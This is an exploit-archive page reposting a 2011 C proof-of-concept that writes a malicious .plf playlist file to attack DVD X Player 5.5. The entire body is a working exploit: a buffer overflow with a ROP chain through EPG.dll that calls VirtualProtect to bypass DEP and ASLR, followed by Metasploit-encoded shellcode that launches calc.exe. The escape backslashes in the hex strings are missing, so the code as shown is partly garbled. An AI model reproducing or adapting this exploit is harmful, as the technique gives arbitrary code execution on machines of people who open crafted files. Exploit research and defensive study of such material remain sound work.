Home / exploits DVD X Player 5.5.0 Pro / Standard Buffer Overflow
Posted on 30 August 2011
// # Author: sickness // # Take a look at mona.py :) awesome tool developed by corelanc0d3r and his team: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ // # ----------------------------------------------------------- // # Exploit Title: DVD X Player 5.5 Professional (.plf) Universal DEP + ASLR BYPASS // # Software Download: http://www.dvd-x-player.com/download.html#dvdPlayer // # Date: 30/08/2011 // # PoC: http://www.exploit-db.com/exploits/17745/ // # Tested on: Windows XP SP2, Windows XP SP3, Windows 7 // # Testers: _ming, g0tmi1k, corelanc0d3r, ryujin, sinn3r O_o. #include <stdio.h> #include <string.h> #include <stdlib.h> main() { char rop[] = "x02x67x62x61" // # POP EAX # RETN [EPG.dll] "x90x90x90x90" // # PADDING "x90x90x90x90" // # PADDING "x90x90x90x90" // # PADDING "x90x90x90x90" // # PADDING "x08x11x01x10" // # POINTER TO VirtualProtect() [IAT SkinScrollBar.Dll] "xedx06x63x61" // # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll] "xd8x85x63x61" // # XCHG EAX,ESI # RETN 00 [EPG.dll] "x02xd2x62x61" // # POP EBP # RETN [EPG.dll] "xc8xcax60x61" // # PUSH ESP [EPG.dll] "x02x67x62x61" // # POP EAX # RETN [EPG.dll] "xffxfaxffxff" // # AFTER NEGATE --> 0x00000501 "x9cx7dx62x61" // # NEG EAX # RETN [EPG.dll] "x24x01x64x61" // # XCHG EAX,EBX # RETN [EPG.dll] "x02x67x62x61" // # POP EAX # RETN [EPG.dll] "xc0xffxffxff" // # AFTER NEGATE --> 0x00000040 "x9cx7dx62x61" // # NEG EAX # RETN [EPG.dll] "xa2x8bx60x61" // # XCHG EAX,EDX # RETN [EPG.dll] "x04xb8x60x61" // # POP ECX # RETN [EPG.dll] "x01xb0x64x61" // # WRITABLE LOCATION [EPG.dll] "x87xe5x62x61" // # POP EDI # RETN [EPG.dll] "x1dx08x63x61" // # RETN (ROP NOP) [EPG.dll] "x02x67x62x61" // # POP EAX # RETN [EPG.dll] "x90x90x90x90" // # PADDING "x31x08x62x61"; // # PUSHAD # RETN [EPG.dll] // # msfpayload windows/exec CMD=calc.exe R | msfencode -b "x00x0ax0dx1a" -t c // # Around 400 bytes for shellcode :) char sc[] = "xbax7ax70x9axd3xd9xc0xd9x74x24xf4x5ex31xc9xb1" "x33x31x56x12x83xc6x04x03x2cx7ex78x26x2cx96xf5" "xc9xccx67x66x43x29x56xb4x37x3axcbx08x33x6exe0" "xe3x11x9ax73x81xbdxadx34x2cx98x80xc5x80x24x4e" "x05x82xd8x8cx5ax64xe0x5fxafx65x25xbdx40x37xfe" "xcaxf3xa8x8bx8excfxc9x5bx85x70xb2xdex59x04x08" "xe0x89xb5x07xaax31xbdx40x0bx40x12x93x77x0bx1f" "x60x03x8axc9xb8xecxbdx35x16xd3x72xb8x66x13xb4" "x23x1dx6fxc7xdex26xb4xbax04xa2x29x1cxcex14x8a" "x9dx03xc2x59x91xe8x80x06xb5xefx45x3dxc1x64x68" "x92x40x3ex4fx36x09xe4xeex6fxf7x4bx0ex6fx5fx33" "xaaxfbx4dx20xccxa1x1bxb7x5cxdcx62xb7x5exdfxc4" "xd0x6fx54x8bxa7x6fxbfxe8x58x3axe2x58xf1xe3x76" "xd9x9cx13xadx1dx99x97x44xddx5ex87x2cxd8x1bx0f" "xdcx90x34xfaxe2x07x34x2fx81xc6xa6xb3x68x6dx4f" "x51x75"; char *exploit=malloc(900),*junk=malloc(260),*junk2=malloc(15),*junk3=malloc(20); memset(junk,0x41,260); memset(junk2,0x90,15); memset(junk3,0x90,20); strcpy(exploit,junk); strcat(exploit,rop); strcat(exploit,junk2); strcat(exploit,sc); strcat(exploit,junk3); printf(" DVD X Player Professional/Standard 5.5 "); printf("Author: sickness "); printf("Creating malicious .plf file, please wait. "); usleep(50000); FILE *evil; evil=fopen("malicious.plf","w"); fwrite(exploit,1,900,evil); fclose(evil); printf("File created! "); return 0; }
